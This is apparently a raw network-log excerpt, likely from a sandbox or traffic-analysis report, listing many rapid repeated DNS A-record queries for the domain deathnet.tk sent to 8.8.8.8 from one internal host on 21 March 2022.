              Mar 21, 2022 20:09:03.286928892 CET192.168.2.238.8.8.80x715eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.332746983 CET192.168.2.238.8.8.80x819aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.378067017 CET192.168.2.238.8.8.80xe9b0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.421612978 CET192.168.2.238.8.8.80xf6bfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.468130112 CET192.168.2.238.8.8.80x8623Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.526285887 CET192.168.2.238.8.8.80x6f9eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.569749117 CET192.168.2.238.8.8.80x4919Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.612854004 CET192.168.2.238.8.8.80xe528Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.658160925 CET192.168.2.238.8.8.80xdcfbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.702719927 CET192.168.2.238.8.8.80xf9a4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.746495962 CET192.168.2.238.8.8.80x9189Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.792133093 CET192.168.2.238.8.8.80x3974Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.837054014 CET192.168.2.238.8.8.80xdd60Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.881863117 CET192.168.2.238.8.8.80xc5a4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.930902958 CET192.168.2.238.8.8.80xa36aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.977446079 CET192.168.2.238.8.8.80x561cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.027451992 CET192.168.2.238.8.8.80xd8b4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.070023060 CET192.168.2.238.8.8.80x561eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.112899065 CET192.168.2.238.8.8.80x662cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.159073114 CET192.168.2.238.8.8.80x1f3eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.204158068 CET192.168.2.238.8.8.80x2d93Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.249995947 CET192.168.2.238.8.8.80x97fbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.292901993 CET192.168.2.238.8.8.80x43abStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.337536097 CET192.168.2.238.8.8.80xddafStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.383265972 CET192.168.2.238.8.8.80xd5c7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.430588961 CET192.168.2.238.8.8.80x9fbbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.474967003 CET192.168.2.238.8.8.80x324fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.517596960 CET192.168.2.238.8.8.80xdbceStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.563055992 CET192.168.2.238.8.8.80xea3dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.606333017 CET192.168.2.238.8.8.80xadd9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.651427984 CET192.168.2.238.8.8.80x8cfeStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.695614100 CET192.168.2.238.8.8.80x14b3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.741324902 CET192.168.2.238.8.8.80x414cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.786145926 CET192.168.2.238.8.8.80x8d0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.839359045 CET192.168.2.238.8.8.80xd6bdStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.882221937 CET192.168.2.238.8.8.80xbfb6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.926625967 CET192.168.2.238.8.8.80xdb28Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.971828938 CET192.168.2.238.8.8.80xbfb1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.016560078 CET192.168.2.238.8.8.80x7ffdStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.059540033 CET192.168.2.238.8.8.80xe5cbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.104451895 CET192.168.2.238.8.8.80xe576Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.153848886 CET192.168.2.238.8.8.80xb4d0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.196681023 CET192.168.2.238.8.8.80xdf01Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.240119934 CET192.168.2.238.8.8.80x4690Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.282732010 CET192.168.2.238.8.8.80xc22bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.367043972 CET192.168.2.238.8.8.80xdc4bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.411398888 CET192.168.2.238.8.8.80x2095Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.455950975 CET192.168.2.238.8.8.80x77b5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.499305010 CET192.168.2.238.8.8.80x9409Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.544090033 CET192.168.2.238.8.8.80x53fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.586735964 CET192.168.2.238.8.8.80x8c1dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.659151077 CET192.168.2.238.8.8.80x8287Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.712454081 CET192.168.2.238.8.8.80xe6bdStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.757256985 CET192.168.2.238.8.8.80x778fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.801686049 CET192.168.2.238.8.8.80xb234Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.849559069 CET192.168.2.238.8.8.80xcb6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.902458906 CET192.168.2.238.8.8.80xadd9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.947628021 CET192.168.2.238.8.8.80x4594Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.992202044 CET192.168.2.238.8.8.80x828bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.132103920 CET192.168.2.238.8.8.80xd4bcStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.179563046 CET192.168.2.238.8.8.80x2fefStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.227180958 CET192.168.2.238.8.8.80x4f02Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.271331072 CET192.168.2.238.8.8.80xf574Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.318250895 CET192.168.2.238.8.8.80x35a8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.365494967 CET192.168.2.238.8.8.80xf610Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.409687996 CET192.168.2.238.8.8.80xeac2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.453706980 CET192.168.2.238.8.8.80x340bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.497946978 CET192.168.2.238.8.8.80x5064Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.546123028 CET192.168.2.238.8.8.80x752bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.597718000 CET192.168.2.238.8.8.80xf94dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.644231081 CET192.168.2.238.8.8.80x65b6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.687794924 CET192.168.2.238.8.8.80x4cd3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.735951900 CET192.168.2.238.8.8.80x740Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.780529976 CET192.168.2.238.8.8.80xfe32Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.825633049 CET192.168.2.238.8.8.80xcaadStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.870836973 CET192.168.2.238.8.8.80xce6aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.916116953 CET192.168.2.238.8.8.80x3576Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.962860107 CET192.168.2.238.8.8.80xdcfaStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.006966114 CET192.168.2.238.8.8.80xbb3dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.054919958 CET192.168.2.238.8.8.80xea1cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.100152016 CET192.168.2.238.8.8.80xc864Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.145884037 CET192.168.2.238.8.8.80xd75bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.202836990 CET192.168.2.238.8.8.80xdbd9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.248038054 CET192.168.2.238.8.8.80x8b74Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.291152954 CET192.168.2.238.8.8.80xf65dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.358935118 CET192.168.2.238.8.8.80xe0e9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.457302094 CET192.168.2.238.8.8.80x8e0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.503427029 CET192.168.2.238.8.8.80xf39eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.549647093 CET192.168.2.238.8.8.80x1306Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.597160101 CET192.168.2.238.8.8.80xcf4fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.653036118 CET192.168.2.238.8.8.80x4ad3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.697943926 CET192.168.2.238.8.8.80x3574Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.744745016 CET192.168.2.238.8.8.80x30afStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.787765026 CET192.168.2.238.8.8.80x4f45Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.830404997 CET192.168.2.238.8.8.80x23c6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.872380972 CET192.168.2.238.8.8.80x39deStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.916309118 CET192.168.2.238.8.8.80xb48eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.958478928 CET192.168.2.238.8.8.80x4cd6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:09.003357887 CET192.168.2.238.8.8.80x8df6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:09.048515081 CET192.168.2.238.8.8.80x47abStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:09.096828938 CET192.168.2.238.8.8.80x405Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:09.144576073 CET192.168.2.238.8.8.80xea60Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:09.191250086 CET192.168.2.238.8.8.80x3085Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:09.235547066 CET192.168.2.238.8.8.80x1d1cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:09.280033112 CET192.168.2.238.8.8.80xc788Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:09.324424028 CET192.168.2.238.8.8.80xd7dfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:09.367173910 CET192.168.2.238.8.8.80x639aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:09.413126945 CET192.168.2.238.8.8.80xa34cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:09.457518101 CET192.168.2.238.8.8.80xab6aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:09.501727104 CET192.168.2.238.8.8.80x2248Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:09.561377048 CET192.168.2.238.8.8.80xf8daStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:09.607566118 CET192.168.2.238.8.8.80x6c19Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:09.655039072 CET192.168.2.238.8.8.80x88f8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:09.697757959 CET192.168.2.238.8.8.80xbb7aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:09.740302086 CET192.168.2.238.8.8.80xf0c4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:09.786047935 CET192.168.2.238.8.8.80x6e99Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:09.920965910 CET192.168.2.238.8.8.80xcca3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:09.965297937 CET192.168.2.238.8.8.80xa919Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:10.009180069 CET192.168.2.238.8.8.80x47b5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:10.055056095 CET192.168.2.238.8.8.80x9841Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:10.098906994 CET192.168.2.238.8.8.80xde33Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:10.145183086 CET192.168.2.238.8.8.80x898eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:10.188734055 CET192.168.2.238.8.8.80xed00Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:10.233434916 CET192.168.2.238.8.8.80x9178Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:10.282475948 CET192.168.2.238.8.8.80x8075Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:10.325231075 CET192.168.2.238.8.8.80xc17aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:10.370255947 CET192.168.2.238.8.8.80x93bfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:10.418104887 CET192.168.2.238.8.8.80xf978Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:10.462281942 CET192.168.2.238.8.8.80x8401Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:10.507850885 CET192.168.2.238.8.8.80x4380Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:10.558527946 CET192.168.2.238.8.8.80x64fcStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:10.601316929 CET192.168.2.238.8.8.80xcfc4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:10.666866064 CET192.168.2.238.8.8.80xad6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:10.713438034 CET192.168.2.238.8.8.80x8f89Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:10.758327007 CET192.168.2.238.8.8.80xf13aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:10.801399946 CET192.168.2.238.8.8.80x3ce0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:10.845604897 CET192.168.2.238.8.8.80xc7afStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:10.888679028 CET192.168.2.238.8.8.80x56f6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:10.931382895 CET192.168.2.238.8.8.80xf620Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:10.976150036 CET192.168.2.238.8.8.80x2484Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:11.020720005 CET192.168.2.238.8.8.80x9fb8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:11.063848019 CET192.168.2.238.8.8.80xd51aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:11.112330914 CET192.168.2.238.8.8.80x30d5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:11.156920910 CET192.168.2.238.8.8.80x68c6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:11.202512026 CET192.168.2.238.8.8.80x21feStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:11.250669956 CET192.168.2.238.8.8.80x8a60Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:11.295713902 CET192.168.2.238.8.8.80xddc4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:11.340929985 CET192.168.2.238.8.8.80xed22Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:11.386620045 CET192.168.2.238.8.8.80x63d3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:11.433356047 CET192.168.2.238.8.8.80x4254Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:11.477274895 CET192.168.2.238.8.8.80xcf0bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:11.521970987 CET192.168.2.238.8.8.80x689Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:11.566556931 CET192.168.2.238.8.8.80xbf51Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:11.613737106 CET192.168.2.238.8.8.80xeb98Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:11.663574934 CET192.168.2.238.8.8.80xaee0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:11.712096930 CET192.168.2.238.8.8.80x5408Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:11.786943913 CET192.168.2.238.8.8.80x34d1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:11.832525015 CET192.168.2.238.8.8.80xa6f9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:11.877032995 CET192.168.2.238.8.8.80xe27bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:11.926384926 CET192.168.2.238.8.8.80x8970Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:11.980856895 CET192.168.2.238.8.8.80xac5fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:12.028987885 CET192.168.2.238.8.8.80x570fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:12.076828957 CET192.168.2.238.8.8.80xc334Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:12.127582073 CET192.168.2.238.8.8.80x66acStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:12.173095942 CET192.168.2.238.8.8.80x3889Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:12.218486071 CET192.168.2.238.8.8.80x8d0fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:12.261924028 CET192.168.2.238.8.8.80x5c9fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:12.307194948 CET192.168.2.238.8.8.80x69bdStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:12.349917889 CET192.168.2.238.8.8.80x487bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:12.404989958 CET192.168.2.238.8.8.80xee62Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:12.449448109 CET192.168.2.238.8.8.80xff3aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:12.492305040 CET192.168.2.238.8.8.80xed99Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:12.535661936 CET192.168.2.238.8.8.80x376Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:12.582549095 CET192.168.2.238.8.8.80x7b1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:12.629419088 CET192.168.2.238.8.8.80xc024Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:12.672679901 CET192.168.2.238.8.8.80x148bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:12.715960026 CET192.168.2.238.8.8.80x6554Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:12.758430004 CET192.168.2.238.8.8.80x5a8cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:12.801250935 CET192.168.2.238.8.8.80xd62fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:12.846285105 CET192.168.2.238.8.8.80xbdcdStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:12.891716003 CET192.168.2.238.8.8.80x9f0bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:12.938607931 CET192.168.2.238.8.8.80x3be2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:12.985833883 CET192.168.2.238.8.8.80x9940Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:13.030682087 CET192.168.2.238.8.8.80x21abStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:13.076090097 CET192.168.2.238.8.8.80xba92Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:13.121876001 CET192.168.2.238.8.8.80x192dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:13.166676998 CET192.168.2.238.8.8.80x7d11Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:13.209656000 CET192.168.2.238.8.8.80xbd19Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:13.254946947 CET192.168.2.238.8.8.80x9650Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:13.300000906 CET192.168.2.238.8.8.80x4d97Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:13.344743013 CET192.168.2.238.8.8.80x1d7bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:13.388025999 CET192.168.2.238.8.8.80x3f84Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:13.433048010 CET192.168.2.238.8.8.80x5265Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:13.477883101 CET192.168.2.238.8.8.80x69e4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:13.525494099 CET192.168.2.238.8.8.80xf98aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:13.571435928 CET192.168.2.238.8.8.80x50cbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:13.618550062 CET192.168.2.238.8.8.80xfb05Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:13.664280891 CET192.168.2.238.8.8.80xebedStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:13.708019018 CET192.168.2.238.8.8.80x6755Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:13.755785942 CET192.168.2.238.8.8.80x5ca9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:13.804341078 CET192.168.2.238.8.8.80xc2e8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:13.851082087 CET192.168.2.238.8.8.80x909eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:13.897284031 CET192.168.2.238.8.8.80x8749Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:13.943036079 CET192.168.2.238.8.8.80x543aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:13.991743088 CET192.168.2.238.8.8.80x490cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:14.038713932 CET192.168.2.238.8.8.80x38d9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:14.087033987 CET192.168.2.238.8.8.80x18d0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:14.132406950 CET192.168.2.238.8.8.80x352eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:14.177922010 CET192.168.2.238.8.8.80x2bafStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:14.221493006 CET192.168.2.238.8.8.80x499fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:14.267000914 CET192.168.2.238.8.8.80xd343Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:14.318280935 CET192.168.2.238.8.8.80x50e5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:14.363383055 CET192.168.2.238.8.8.80xf1b3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:14.408478022 CET192.168.2.238.8.8.80xb1d9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:14.453753948 CET192.168.2.238.8.8.80xde71Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:14.499224901 CET192.168.2.238.8.8.80xe664Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:14.545948029 CET192.168.2.238.8.8.80xa8bbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:14.590043068 CET192.168.2.238.8.8.80xc2fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
